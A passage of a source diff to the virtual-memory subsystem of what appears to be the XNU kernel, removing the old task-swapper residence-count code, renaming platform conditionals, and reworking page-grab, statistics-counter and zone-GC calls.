memory_object_control_disable(&object->pager_control); } object->ref_count--; -#if TASK_SWAPPER - assert(object->res_count == 0); -#endif /* TASK_SWAPPER */ - assert(object->ref_count == 0); /* @@ -1646,7 +1645,7 @@ restart_after_sleep: pmap_flush_context_init(&pmap_flush_context_storage); } - vm_page_lockspin_queues(); + vm_page_lock_queues(); next = (vm_page_t)vm_page_queue_first(&object->memq); @@ -1675,7 +1674,7 @@ restart_after_sleep: loop_count = BATCH_LIMIT(V_O_R_MAX_BATCH); - vm_page_lockspin_queues(); + vm_page_lock_queues(); } if (reap_type == REAP_DATA_FLUSH || reap_type == REAP_TERMINATE) { if (p->vmp_busy || p->vmp_cleaning) { @@ -1974,7 +1973,7 @@ vm_object_destroy( old_pager = object->pager; object->pager = MEMORY_OBJECT_NULL; if (old_pager != MEMORY_OBJECT_NULL) { - memory_object_control_disable(object->pager_control); + memory_object_control_disable(&object->pager_control); } /* @@ -3736,13 +3735,6 @@ Retry: assert(new_copy->ref_count > 0); new_copy->ref_count++; /* for old_copy->shadow ref. */ -#if TASK_SWAPPER - if (old_copy->res_count) { - VM_OBJ_RES_INCR(new_copy); - VM_OBJ_RES_DECR(src_object); - } -#endif - vm_object_unlock(old_copy); /* done with old_copy */ } @@ -3926,6 +3918,14 @@ vm_object_shadow( assert(source->copy_strategy != MEMORY_OBJECT_COPY_NONE); /* Purgeable objects shouldn't have shadow objects. */ +#if 00 + /* + * The following optimization does not work in the context of submaps + * (the shared region, in particular). + * This object might have only 1 reference (in the submap) but that + * submap can itself be mapped multiple times, so the object is + * actually indirectly referenced more than once... + */ if (vm_object_shadow_check && source->vo_size == length && source->ref_count == 1) { @@ -3951,6 +3951,7 @@ vm_object_shadow( /* things changed while we were locking "source"... */ vm_object_unlock(source); } +#endif /* 00 */ /* * *offset is the map entry's offset into the VM object and @@ -4489,7 +4490,7 @@ vm_object_do_collapse( object->paging_offset = backing_object->paging_offset + backing_offset; if (object->pager_control != MEMORY_OBJECT_CONTROL_NULL) { - memory_object_control_collapse(object->pager_control, + memory_object_control_collapse(&object->pager_control, object); } /* the backing_object has lost its pager: reset all fields */ @@ -4581,26 +4582,7 @@ vm_object_do_bypass( vm_object_lock_assert_exclusive(object); vm_object_lock_assert_exclusive(backing_object); -#if TASK_SWAPPER - /* - * Do object reference in-line to - * conditionally increment shadow's - * residence count. If object is not - * resident, leave residence count - * on shadow alone. - */ - if (backing_object->shadow != VM_OBJECT_NULL) { - vm_object_lock(backing_object->shadow); - vm_object_lock_assert_exclusive(backing_object->shadow); - backing_object->shadow->ref_count++; - if (object->res_count != 0) { - vm_object_res_reference(backing_object->shadow); - } - vm_object_unlock(backing_object->shadow); - } -#else /* TASK_SWAPPER */ vm_object_reference(backing_object->shadow); -#endif /* TASK_SWAPPER */ assert(!object->phys_contiguous); assert(!backing_object->phys_contiguous); @@ -4654,12 +4636,6 @@ vm_object_do_bypass( (!backing_object->named && backing_object->ref_count > 1)) { vm_object_lock_assert_exclusive(backing_object); backing_object->ref_count--; -#if TASK_SWAPPER - if (object->res_count != 0) { - vm_object_res_deallocate(backing_object); - } - assert(backing_object->ref_count > 0); -#endif /* TASK_SWAPPER */ vm_object_unlock(backing_object); } else { /* @@ -4667,12 +4643,6 @@ vm_object_do_bypass( * the backing object. */ -#if TASK_SWAPPER - if (object->res_count == 0) { - /* XXX get a reference for the deallocate below */ - vm_object_res_reference(backing_object); - } -#endif /* TASK_SWAPPER */ /* * vm_object_collapse (the caller of this function) is * now called from contexts that may not guarantee that a @@ -5373,9 +5343,7 @@ vm_object_populate_with_private( VM_PAGE_SET_PHYS_PAGE(m, base_page); } } else { - while ((m = vm_page_grab_fictitious()) == VM_PAGE_NULL) { - vm_page_more_fictitious(); - } + m = vm_page_grab_fictitious(TRUE); /* * private normally requires lock_queues but since we @@ -5496,7 +5464,6 @@ restart: object->named = TRUE; vm_object_lock_assert_exclusive(object); object->ref_count++; - vm_object_res_reference(object); while (!object->pager_ready) { vm_object_sleep(object, VM_OBJECT_EVENT_PAGER_READY, @@ -5579,7 +5546,6 @@ vm_object_release_name( vm_object_deallocate(object); return KERN_SUCCESS; } - VM_OBJ_RES_DECR(object); shadow = object->pageout?VM_OBJECT_NULL:object->shadow; if (object->ref_count == 1) { @@ -6287,93 +6253,6 @@ out: } -#if TASK_SWAPPER -/* - * vm_object_res_deallocate - * - * (recursively) decrement residence counts on vm objects and their shadows. - * Called from vm_object_deallocate and when swapping out an object. - * - * The object is locked, and remains locked throughout the function, - * even as we iterate down the shadow chain. Locks on intermediate objects - * will be dropped, but not the original object. - * - * NOTE: this function used to use recursion, rather than iteration. - */ - -__private_extern__ void -vm_object_res_deallocate( - vm_object_t object) -{ - vm_object_t orig_object = object; - /* - * Object is locked so it can be called directly - * from vm_object_deallocate. Original object is never - * unlocked. - */ - assert(object->res_count > 0); - while (--object->res_count == 0) { - assert(object->ref_count >= object->res_count); - vm_object_deactivate_all_pages(object); - /* iterate on shadow, if present */ - if (object->shadow != VM_OBJECT_NULL) { - vm_object_t tmp_object = object->shadow; - vm_object_lock(tmp_object); - if (object != orig_object) { - vm_object_unlock(object); - } - object = tmp_object; - assert(object->res_count > 0); - } else { - break; - } - } - if (object != orig_object) { - vm_object_unlock(object); - } -} - -/* - * vm_object_res_reference - * - * Internal function to increment residence count on a vm object - * and its shadows. It is called only from vm_object_reference, and - * when swapping in a vm object, via vm_map_swap. - * - * The object is locked, and remains locked throughout the function, - * even as we iterate down the shadow chain. Locks on intermediate objects - * will be dropped, but not the original object. - * - * NOTE: this function used to use recursion, rather than iteration. - */ - -__private_extern__ void -vm_object_res_reference( - vm_object_t object) -{ - vm_object_t orig_object = object; - /* - * Object is locked, so this can be called directly - * from vm_object_reference. This lock is never released. - */ - while ((++object->res_count == 1) && - (object->shadow != VM_OBJECT_NULL)) { - vm_object_t tmp_object = object->shadow; - - assert(object->ref_count >= object->res_count); - vm_object_lock(tmp_object); - if (object != orig_object) { - vm_object_unlock(object); - } - object = tmp_object; - } - if (object != orig_object) { - vm_object_unlock(object); - } - assert(orig_object->ref_count >= orig_object->res_count); -} -#endif /* TASK_SWAPPER */ - /* * vm_object_reference: * @@ -6576,9 +6455,6 @@ MACRO_END /* "ref_count" refers to the object not its contents */ assert(object1->ref_count >= 1); assert(object2->ref_count >= 1); -#if TASK_SWAPPER - /* "res_count" refers to the object not its contents */ -#endif /* "resident_page_count" was updated above when transposing pages */ /* "wired_page_count" was updated above when transposing pages */ #if !VM_TAG_ACTIVE_UPDATE @@ -6597,11 +6473,11 @@ MACRO_END __TRANSPOSE_FIELD(pager_control); /* update the memory_objects' pointers back to the VM objects */ if (object1->pager_control != MEMORY_OBJECT_CONTROL_NULL) { - memory_object_control_collapse(object1->pager_control, + memory_object_control_collapse(&object1->pager_control, object1); } if (object2->pager_control != MEMORY_OBJECT_CONTROL_NULL) { - memory_object_control_collapse(object2->pager_control, + memory_object_control_collapse(&object2->pager_control, object2); } __TRANSPOSE_FIELD(copy_strategy); @@ -6754,11 +6630,11 @@ extern int speculative_reads_disabled; * that could give us non-page-size aligned values if we start out with values that * are odd multiples of PAGE_SIZE. */ -#if CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX unsigned int preheat_max_bytes = (1024 * 512); -#else /* CONFIG_EMBEDDED */ +#else /* !XNU_TARGET_OS_OSX */ unsigned int preheat_max_bytes = MAX_UPL_TRANSFER_BYTES; -#endif /* CONFIG_EMBEDDED */ +#endif /* !XNU_TARGET_OS_OSX */ unsigned int preheat_min_bytes = (1024 * 32); @@ -6821,7 +6697,7 @@ vm_object_cluster_size(vm_object_t object, vm_object_offset_t *start, min_ph_size = round_page(preheat_min_bytes); max_ph_size = round_page(preheat_max_bytes); -#if !CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX if (isSSD) { min_ph_size /= 2; max_ph_size /= 8; @@ -6834,7 +6710,7 @@ vm_object_cluster_size(vm_object_t object, vm_object_offset_t *start, max_ph_size = trunc_page(max_ph_size); } } -#endif /* !CONFIG_EMBEDDED */ +#endif /* XNU_TARGET_OS_OSX */ if (min_ph_size < PAGE_SIZE) { min_ph_size = PAGE_SIZE; @@ -8779,9 +8655,7 @@ again: vm_object_unlock(object); } - if (__improbable(task->task_volatile_objects != 0 || - task->task_nonvolatile_objects != 0 || - task->task_owned_objects != 0)) { + if (__improbable(task->task_owned_objects != 0)) { panic("%s(%p): volatile=%d nonvolatile=%d owned=%d q=%p q_first=%p q_last=%p", __FUNCTION__, task, diff --git a/osfmk/vm/vm_object.h b/osfmk/vm/vm_object.h index 6399f95d0..f05742914 100644 --- a/osfmk/vm/vm_object.h +++ b/osfmk/vm/vm_object.h @@ -69,7 +69,6 @@ #include #include #include -#include #include #include @@ -429,6 +428,9 @@ vm_object_t kernel_object; /* the single kernel object */ extern vm_object_t compressor_object; /* the single compressor object */ +extern +vm_object_t retired_pages_object; /* holds VM pages which should never be used */ + extern unsigned int vm_object_absent_max; /* maximum number of absent pages * at a time for each object */ @@ -604,24 +606,6 @@ __private_extern__ vm_object_t vm_object_allocate(vm_object_size_t size); __private_extern__ void _vm_object_allocate(vm_object_size_t size, vm_object_t object); -#if TASK_SWAPPER - -__private_extern__ void vm_object_res_reference( - vm_object_t object); -__private_extern__ void vm_object_res_deallocate( - vm_object_t object); -#define VM_OBJ_RES_INCR(object) (object)->res_count++ -#define VM_OBJ_RES_DECR(object) (object)->res_count-- - -#else /* TASK_SWAPPER */ - -#define VM_OBJ_RES_INCR(object) -#define VM_OBJ_RES_DECR(object) -#define vm_object_res_reference(object) -#define vm_object_res_deallocate(object) - -#endif /* TASK_SWAPPER */ - #define vm_object_reference_locked(object) \ MACRO_BEGIN \ vm_object_t RLObject = (object); \ @@ -629,19 +613,16 @@ __private_extern__ void vm_object_res_deallocate( assert((RLObject)->ref_count > 0); \ (RLObject)->ref_count++; \ assert((RLObject)->ref_count > 1); \ - vm_object_res_reference(RLObject); \ MACRO_END -#define vm_object_reference_shared(object) \ - MACRO_BEGIN \ - vm_object_t RLObject = (object); \ - vm_object_lock_assert_shared(object); \ - assert((RLObject)->ref_count > 0); \ +#define vm_object_reference_shared(object) \ + MACRO_BEGIN \ + vm_object_t RLObject = (object); \ + vm_object_lock_assert_shared(object); \ + assert((RLObject)->ref_count > 0); \ OSAddAtomic(1, &(RLObject)->ref_count); \ - assert((RLObject)->ref_count > 0); \ - /* XXX we would need an atomic version of the following ... */ \ - vm_object_res_reference(RLObject); \ + assert((RLObject)->ref_count > 0); \ MACRO_END diff --git a/osfmk/vm/vm_page.h b/osfmk/vm/vm_page.h index 164a36145..d4542fd10 100644 --- a/osfmk/vm/vm_page.h +++ b/osfmk/vm/vm_page.h @@ -1423,6 +1423,9 @@ extern void vm_page_create( ppnum_t start, ppnum_t end); +extern void vm_page_create_retired( + ppnum_t pn); + extern vm_page_t kdp_vm_page_lookup( vm_object_t object, vm_object_offset_t offset); @@ -1431,18 +1434,16 @@ extern vm_page_t vm_page_lookup( vm_object_t object, vm_object_offset_t offset); -extern vm_page_t vm_page_grab_fictitious(void); +extern vm_page_t vm_page_grab_fictitious(boolean_t canwait); -extern vm_page_t vm_page_grab_guard(void); +extern vm_page_t vm_page_grab_guard(boolean_t canwait); extern void vm_page_release_fictitious( vm_page_t page); extern void vm_free_delayed_pages(void); -extern void vm_page_more_fictitious(void); - -extern int vm_pool_low(void); +extern bool vm_pool_low(void); extern vm_page_t vm_page_grab(void); extern vm_page_t vm_page_grab_options(int flags); @@ -1466,10 +1467,6 @@ extern vm_page_t vm_page_alloc( vm_object_t object, vm_object_offset_t offset); -extern vm_page_t vm_page_alloc_guard( - vm_object_t object, - vm_object_offset_t offset); - extern void vm_page_init( vm_page_t page, ppnum_t phys_page, @@ -1630,15 +1627,15 @@ extern void memorystatus_pages_update(unsigned int pages_avail); #else /* CONFIG_JETSAM */ -#if CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX #define VM_CHECK_MEMORYSTATUS do {} while(0) -#else /* CONFIG_EMBEDDED */ +#else /* !XNU_TARGET_OS_OSX */ #define VM_CHECK_MEMORYSTATUS vm_pressure_response() -#endif /* CONFIG_EMBEDDED */ +#endif /* !XNU_TARGET_OS_OSX */ #endif /* CONFIG_JETSAM */ @@ -1647,7 +1644,7 @@ extern void memorystatus_pages_update(unsigned int pages_avail); * protected by the object lock. */ -#if CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX #define SET_PAGE_DIRTY(m, set_pmap_modified) \ MACRO_BEGIN \ vm_page_t __page__ = (m); \ @@ -1659,13 +1656,13 @@ extern void memorystatus_pages_update(unsigned int pages_avail); } \ __page__->vmp_dirty = TRUE; \ MACRO_END -#else /* CONFIG_EMBEDDED */ +#else /* !XNU_TARGET_OS_OSX */ #define SET_PAGE_DIRTY(m, set_pmap_modified) \ MACRO_BEGIN \ vm_page_t __page__ = (m); \ __page__->vmp_dirty = TRUE; \ MACRO_END -#endif /* CONFIG_EMBEDDED */ +#endif /* !XNU_TARGET_OS_OSX */ #define PAGE_ASSERT_WAIT(m, interruptible) \ (((m)->vmp_wanted = TRUE), \ @@ -1702,12 +1699,6 @@ extern void memorystatus_pages_update(unsigned int pages_avail); vm_page_free_unlocked(p, TRUE); \ MACRO_END -#define VM_PAGE_GRAB_FICTITIOUS(M) \ - MACRO_BEGIN \ - while ((M = vm_page_grab_fictitious()) == VM_PAGE_NULL) \ - vm_page_more_fictitious(); \ - MACRO_END - #define VM_PAGE_WAIT() ((void)vm_page_wait(THREAD_UNINT)) #define vm_page_queue_lock (vm_page_locks.vm_page_queue_lock2) @@ -1860,5 +1851,7 @@ extern void start_secluded_suppression(task_t); extern void stop_secluded_suppression(task_t); #endif /* CONFIG_SECLUDED_MEMORY */ +extern void vm_retire_boot_pages(void); +extern uint32_t vm_retired_pages_count(void); #endif /* _VM_VM_PAGE_H_ */ diff --git a/osfmk/vm/vm_pageout.c b/osfmk/vm/vm_pageout.c index 63dd004ea..416921ce3 100644 --- a/osfmk/vm/vm_pageout.c +++ b/osfmk/vm/vm_pageout.c @@ -82,7 +82,7 @@ #include #include -#include +#include #include #include #include @@ -151,11 +151,11 @@ thread_t vm_pageout_scan_thread = THREAD_NULL; boolean_t vps_dynamic_priority_enabled = FALSE; #ifndef VM_PAGEOUT_BURST_INACTIVE_THROTTLE /* maximum iterations of the inactive queue w/o stealing/cleaning a page */ -#ifdef CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX #define VM_PAGEOUT_BURST_INACTIVE_THROTTLE 1024 -#else +#else /* !XNU_TARGET_OS_OSX */ #define VM_PAGEOUT_BURST_INACTIVE_THROTTLE 4096 -#endif +#endif /* !XNU_TARGET_OS_OSX */ #endif #ifndef VM_PAGEOUT_DEADLOCK_RELIEF @@ -214,11 +214,11 @@ boolean_t vps_dynamic_priority_enabled = FALSE; */ #ifndef VM_PAGE_FREE_TARGET -#ifdef CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX #define VM_PAGE_FREE_TARGET(free) (15 + (free) / 100) -#else +#else /* !XNU_TARGET_OS_OSX */ #define VM_PAGE_FREE_TARGET(free) (15 + (free) / 80) -#endif +#endif /* !XNU_TARGET_OS_OSX */ #endif /* VM_PAGE_FREE_TARGET */ @@ -228,22 +228,22 @@ boolean_t vps_dynamic_priority_enabled = FALSE; */ #ifndef VM_PAGE_FREE_MIN -#ifdef CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX #define VM_PAGE_FREE_MIN(free) (10 + (free) / 200) -#else +#else /* !XNU_TARGET_OS_OSX */ #define VM_PAGE_FREE_MIN(free) (10 + (free) / 100) -#endif +#endif /* !XNU_TARGET_OS_OSX */ #endif /* VM_PAGE_FREE_MIN */ -#ifdef CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX #define VM_PAGE_FREE_RESERVED_LIMIT 100 #define VM_PAGE_FREE_MIN_LIMIT 1500 #define VM_PAGE_FREE_TARGET_LIMIT 2000 -#else +#else /* !XNU_TARGET_OS_OSX */ #define VM_PAGE_FREE_RESERVED_LIMIT 1700 #define VM_PAGE_FREE_MIN_LIMIT 3500 #define VM_PAGE_FREE_TARGET_LIMIT 4000 -#endif +#endif /* !XNU_TARGET_OS_OSX */ /* * When vm_page_free_count falls below vm_page_free_reserved, @@ -269,11 +269,11 @@ boolean_t vps_dynamic_priority_enabled = FALSE; #define VM_PAGE_REACTIVATE_LIMIT_MAX 20000 #ifndef VM_PAGE_REACTIVATE_LIMIT -#ifdef CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX #define VM_PAGE_REACTIVATE_LIMIT(avail) (VM_PAGE_INACTIVE_TARGET(avail) / 2) -#else +#else /* !XNU_TARGET_OS_OSX */ #define VM_PAGE_REACTIVATE_LIMIT(avail) (MAX((avail) * 1 / 20,VM_PAGE_REACTIVATE_LIMIT_MAX)) -#endif +#endif /* !XNU_TARGET_OS_OSX */ #endif /* VM_PAGE_REACTIVATE_LIMIT */ #define VM_PAGEOUT_INACTIVE_FORCE_RECLAIM 1000 @@ -315,9 +315,9 @@ boolean_t vm_pageout_running = FALSE; uint32_t vm_page_upl_tainted = 0; uint32_t vm_page_iopl_tainted = 0; -#if !CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX static boolean_t vm_pageout_waiter = FALSE; -#endif /* !CONFIG_EMBEDDED */ +#endif /* XNU_TARGET_OS_OSX */ #if DEVELOPMENT || DEBUG @@ -446,7 +446,7 @@ vm_pageout_object_terminate( if (m->vmp_dirty) { vm_page_unwire(m, TRUE); /* reactivates */ - VM_STAT_INCR(reactivations); + counter_inc(&vm_statistics_reactivations); PAGE_WAKEUP_DONE(m); } else { vm_page_free(m); /* clears busy, etc. */ @@ -1587,7 +1587,7 @@ update_vm_info(void) vm_pageout_stats[vm_pageout_stat_now].phantom_ghosts_added = (unsigned int)(tmp - last.vm_phantom_cache_added_ghost); last.vm_phantom_cache_added_ghost = tmp; - tmp64 = get_pages_grabbed_count(); + tmp64 = counter_load(&vm_page_grab_count); vm_pageout_stats[vm_pageout_stat_now].pages_grabbed = (unsigned int)(tmp64 - last_vm_page_pages_grabbed); last_vm_page_pages_grabbed = tmp64; @@ -2299,8 +2299,6 @@ vps_flow_control(struct flow_control *flow_control, int *anons_grabbed, vm_objec iq->pgo_throttled = TRUE; assert_wait_timeout((event_t) &iq->pgo_laundry, THREAD_INTERRUPTIBLE, msecs, 1000 * NSEC_PER_USEC); - counter(c_vm_pageout_scan_block++); - vm_page_unlock_queues(); assert(vm_pageout_scan_wants_object == VM_OBJECT_NULL); @@ -2478,7 +2476,7 @@ want_anonymous: vm_pageout_vminfo.vm_pageout_filecache_min_reactivated++; vm_page_activate(m); - VM_STAT_INCR(reactivations); + counter_inc(&vm_statistics_reactivations); #if CONFIG_BACKGROUND_QUEUE #if DEVELOPMENT || DEBUG if (*is_page_from_bg_q == TRUE) { @@ -2748,7 +2746,7 @@ vps_deal_with_throttled_queues(vm_page_t m, vm_object_t *object, uint32_t *vm_pa #endif /* CONFIG_MEMORYSTATUS && CONFIG_JETSAM */ } else { vm_page_activate(m); - VM_STAT_INCR(reactivations); + counter_inc(&vm_statistics_reactivations); #if CONFIG_BACKGROUND_QUEUE #if DEVELOPMENT || DEBUG @@ -3418,7 +3416,7 @@ reactivate_page: * The page was/is being used, so put back on active list. */ vm_page_activate(m); - VM_STAT_INCR(reactivations); + counter_inc(&vm_statistics_reactivations); inactive_burst_count = 0; } #if CONFIG_BACKGROUND_QUEUE @@ -3727,22 +3725,21 @@ vm_pageout_continue(void) assert_wait((event_t) &vm_page_free_wanted, THREAD_UNINT); vm_pageout_running = FALSE; -#if !CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX if (vm_pageout_waiter) { vm_pageout_waiter = FALSE; thread_wakeup((event_t)&vm_pageout_waiter); } -#endif /* !CONFIG_EMBEDDED */ +#endif /* XNU_TARGET_OS_OSX */ lck_mtx_unlock(&vm_page_queue_free_lock); vm_page_unlock_queues(); - counter(c_vm_pageout_block++); thread_block((thread_continue_t)vm_pageout_continue); /*NOTREACHED*/ } -#if !CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX kern_return_t vm_pageout_wait(uint64_t deadline) { @@ -3761,7 +3758,7 @@ vm_pageout_wait(uint64_t deadline) return kr; } -#endif /* !CONFIG_EMBEDDED */ +#endif /* XNU_TARGET_OS_OSX */ static void @@ -4232,7 +4229,7 @@ vm_pageout_compress_page(void **current_chead, char *scratch_buf, vm_page_t m) vm_object_owner_compressed_update(object, +1); } - VM_STAT_INCR(compressions); + counter_inc(&vm_statistics_compressions); if (m->vmp_tabled) { vm_page_remove(m, TRUE); @@ -4380,16 +4377,16 @@ vm_pressure_response(void) return; } -#if CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX available_memory = (uint64_t) memorystatus_available_pages; -#else /* CONFIG_EMBEDDED */ +#else /* !XNU_TARGET_OS_OSX */ available_memory = (uint64_t) AVAILABLE_NON_COMPRESSED_MEMORY; memorystatus_available_pages = (uint64_t) AVAILABLE_NON_COMPRESSED_MEMORY; -#endif /* CONFIG_EMBEDDED */ +#endif /* !XNU_TARGET_OS_OSX */ total_pages = (unsigned int) atop_64(max_mem); #if CONFIG_SECLUDED_MEMORY @@ -4582,7 +4579,7 @@ void vm_pageout_garbage_collect(int collect) { if (collect) { - if (is_zone_map_nearing_exhaustion()) { + if (zone_map_nearing_exhaustion()) { /* * Woken up by the zone allocator for zone-map-exhaustion jetsams. * @@ -4600,7 +4597,7 @@ vm_pageout_garbage_collect(int collect) * ok; if memory pressure persists, the thread will simply be woken * up again. */ - consider_zone_gc(TRUE); + zone_gc(ZONE_GC_JETSAM); } else { /* Woken up by vm_pageout_scan or compute_pageout_gc_throttle. */ boolean_t buf_large_zfree = FALSE; @@ -4617,10 +4614,10 @@ vm_pageout_garbage_collect(int collect) } if (first_try == TRUE || buf_large_zfree == TRUE) { /* - * consider_zone_gc should be last, because the other operations + * zone_gc should be last, because the other operations * might return memory to zones. */ - consider_zone_gc(FALSE); + zone_gc(ZONE_GC_TRIM); } first_try = FALSE; } while (buf_large_zfree == TRUE && vm_page_free_count < vm_page_free_target); @@ -4872,13 +4869,22 @@ vm_pageout(void) thread_set_thread_name(vm_pageout_state.vm_pageout_external_iothread, "VM_pageout_external_iothread"); thread_deallocate(vm_pageout_state.vm_pageout_external_iothread); - result = kernel_thread_start_priority((thread_continue_t)vm_pageout_garbage_collect, NULL, + result = kernel_thread_create((thread_continue_t)vm_pageout_garbage_collect, NULL, BASEPRI_DEFAULT, &thread); if (result != KERN_SUCCESS) { panic("vm_pageout_garbage_collect: create failed"); } thread_set_thread_name(thread, "VM_pageout_garbage_collect"); + if (thread->reserved_stack == 0) { + assert(thread->kernel_stack); + thread->reserved_stack = thread->kernel_stack; + } + + thread_mtx_lock(thread); + thread_start(thread); + thread_mtx_unlock(thread); + thread_deallocate(thread); #if VM_PRESSURE_EVENTS @@ -5010,15 +5016,15 @@ vm_pageout_internal_start(void) assert(hinfo.max_cpus > 0); -#if CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX vm_pageout_state.vm_compressor_thread_count = 1; -#else +#else /* !XNU_TARGET_OS_OSX */ if (hinfo.max_cpus > 4) { vm_pageout_state.vm_compressor_thread_count = 2; } else { vm_pageout_state.vm_compressor_thread_count = 1; } -#endif +#endif /* !XNU_TARGET_OS_OSX */ PE_parse_boot_argn("vmcomp_threads", &vm_pageout_state.vm_compressor_thread_count, sizeof(vm_pageout_state.vm_compressor_thread_count)); @@ -5339,27 +5345,19 @@ must_throttle_writes() #define MAX_DELAYED_WORK_CTX_ALLOCATED (512) int vm_page_delayed_work_ctx_needed = 0; -zone_t dw_ctx_zone = ZONE_NULL; +SECURITY_READ_ONLY_LATE(zone_t) dw_ctx_zone; void vm_page_delayed_work_init_ctx(void) { - int nelems = 0, elem_size = 0; - - elem_size = sizeof(struct vm_page_delayed_work_ctx); + size_t elem_size = sizeof(struct vm_page_delayed_work_ctx); dw_ctx_zone = zone_create_ext("delayed-work-ctx", elem_size, ZC_NOGC, ZONE_ID_ANY, ^(zone_t z) { - zone_set_exhaustible(z, MAX_DELAYED_WORK_CTX_ALLOCATED * elem_size); + zone_set_exhaustible(z, MAX_DELAYED_WORK_CTX_ALLOCATED); }); - nelems = zfill(dw_ctx_zone, MIN_DELAYED_WORK_CTX_ALLOCATED); - if (nelems < MIN_DELAYED_WORK_CTX_ALLOCATED) { - printf("vm_page_delayed_work_init_ctx: Failed to preallocate minimum delayed work contexts (%d vs %d).\n", nelems, MIN_DELAYED_WORK_CTX_ALLOCATED); -#if DEVELOPMENT || DEBUG - panic("Failed to preallocate minimum delayed work contexts (%d vs %d).\n", nelems, MIN_DELAYED_WORK_CTX_ALLOCATED); -#endif /* DEVELOPMENT || DEBUG */ - } + zone_fill_initially(dw_ctx_zone, MIN_DELAYED_WORK_CTX_ALLOCATED); } struct vm_page_delayed_work* @@ -5578,7 +5576,7 @@ vm_object_upl_request( "object %p shadow_offset 0x%llx", upl->map_object, upl->map_object->vo_shadow_offset); - VM_PAGE_GRAB_FICTITIOUS(alias_page); + alias_page = vm_page_grab_fictitious(TRUE); upl->flags |= UPL_SHADOWED; } @@ -5648,11 +5646,11 @@ vm_object_upl_request( if ((cntrl_flags & UPL_WILL_MODIFY) && must_throttle_writes() == TRUE) { boolean_t isSSD = FALSE; -#if CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX isSSD = TRUE; -#else +#else /* !XNU_TARGET_OS_OSX */ vnode_pager_get_isSSD(object->pager, &isSSD); -#endif +#endif /* !XNU_TARGET_OS_OSX */ vm_object_unlock(object); OSAddAtomic(size_in_pages, &vm_upl_wait_for_pages); @@ -5672,7 +5670,7 @@ vm_object_upl_request( if ((alias_page == NULL) && !(cntrl_flags & UPL_SET_LITE)) { vm_object_unlock(object); - VM_PAGE_GRAB_FICTITIOUS(alias_page); + alias_page = vm_page_grab_fictitious(TRUE); vm_object_lock(object); } if (cntrl_flags & UPL_COPYOUT_FROM) { @@ -6030,7 +6028,7 @@ check_busy: dst_page->vmp_clustered = TRUE; if (!(cntrl_flags & UPL_FILE_IO)) { - VM_STAT_INCR(pageins); + counter_inc(&vm_statistics_pageins); } } } @@ -6201,7 +6199,7 @@ check_busy: try_next_page: if (dwp->dw_mask) { if (dwp->dw_mask & DW_vm_page_activate) { - VM_STAT_INCR(reactivations); + counter_inc(&vm_statistics_reactivations); } VM_PAGE_ADD_DELAYED_WORK(dwp, dst_page, dw_count); @@ -6462,7 +6460,7 @@ REDISCOVER_ENTRY: goto done; } -#if CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX if (map->pmap != kernel_pmap && (caller_flags & UPL_COPYOUT_FROM) && (entry->protection & VM_PROT_EXECUTE) && @@ -6531,7 +6529,7 @@ REDISCOVER_ENTRY: #endif /* DEVELOPMENT || DEBUG */ goto done; } -#endif /* CONFIG_EMBEDDED */ +#endif /* !XNU_TARGET_OS_OSX */ local_object = VME_OBJECT(entry); assert(local_object != VM_OBJECT_NULL); @@ -6637,24 +6635,6 @@ REDISCOVER_ENTRY: vm_map_t real_map; vm_prot_t fault_type; - if (entry->vme_start < VM_MAP_TRUNC_PAGE(offset, VM_MAP_PAGE_MASK(map)) || - entry->vme_end > VM_MAP_ROUND_PAGE(offset + *upl_size, VM_MAP_PAGE_MASK(map))) { - /* - * Clip the requested range first to minimize the - * amount of potential copying... - */ - if (vm_map_lock_read_to_write(map)) { - goto REDISCOVER_ENTRY; - } - vm_map_lock_assert_exclusive(map); - assert(VME_OBJECT(entry) == local_object); - vm_map_clip_start(map, entry, - VM_MAP_TRUNC_PAGE(offset, VM_MAP_PAGE_MASK(map))); - vm_map_clip_end(map, entry, - VM_MAP_ROUND_PAGE(offset + *upl_size, VM_MAP_PAGE_MASK(map))); - vm_map_lock_write_to_read(map); - } - local_map = map; if (caller_flags & UPL_COPYOUT_FROM) { @@ -7009,7 +6989,7 @@ process_upl_to_enter: assert(pg_num == new_offset / PAGE_SIZE); if (lite_list[pg_num >> 5] & (1U << (pg_num & 31))) { - VM_PAGE_GRAB_FICTITIOUS(alias_page); + alias_page = vm_page_grab_fictitious(TRUE); vm_object_lock(object); @@ -7739,7 +7719,7 @@ process_upl_to_commit: dwp->dw_mask |= DW_vm_page_activate | DW_PAGE_WAKEUP; if (upl->flags & UPL_PAGEOUT) { - VM_STAT_INCR(reactivations); + counter_inc(&vm_statistics_reactivations); DTRACE_VM2(pgrec, int, 1, (uint64_t *), NULL); } } else { @@ -7780,7 +7760,7 @@ process_upl_to_commit: if (hibernate_cleaning_in_progress == FALSE && !m->vmp_dirty && (upl->flags & UPL_PAGEOUT)) { pgpgout_count++; - VM_STAT_INCR(pageouts); + counter_inc(&vm_statistics_pageouts); DTRACE_VM2(pgout, int, 1, (uint64_t *), NULL); dwp->dw_mask |= DW_enqueue_cleaned; @@ -9672,7 +9652,7 @@ return_err: vm_page_unlock_queues(); if (need_unwire == TRUE) { - VM_STAT_INCR(reactivations); + counter_inc(&vm_statistics_reactivations); } } #if UPL_DEBUG diff --git a/osfmk/vm/vm_pageout.h b/osfmk/vm/vm_pageout.h index 980095f6f..94e667ca4 100644 --- a/osfmk/vm/vm_pageout.h +++ b/osfmk/vm/vm_pageout.h @@ -227,7 +227,11 @@ extern upl_size_t upl_get_size( extern upl_t upl_associated_upl(upl_t upl); extern void upl_set_associated_upl(upl_t upl, upl_t associated_upl); +#ifndef MACH_KERNEL_PRIVATE +typedef struct vm_page *vm_page_t; +#endif #ifdef XNU_KERNEL_PRIVATE +#include extern upl_size_t upl_adjusted_size( upl_t upl, @@ -252,22 +256,18 @@ extern void iopl_valid_data( upl_t 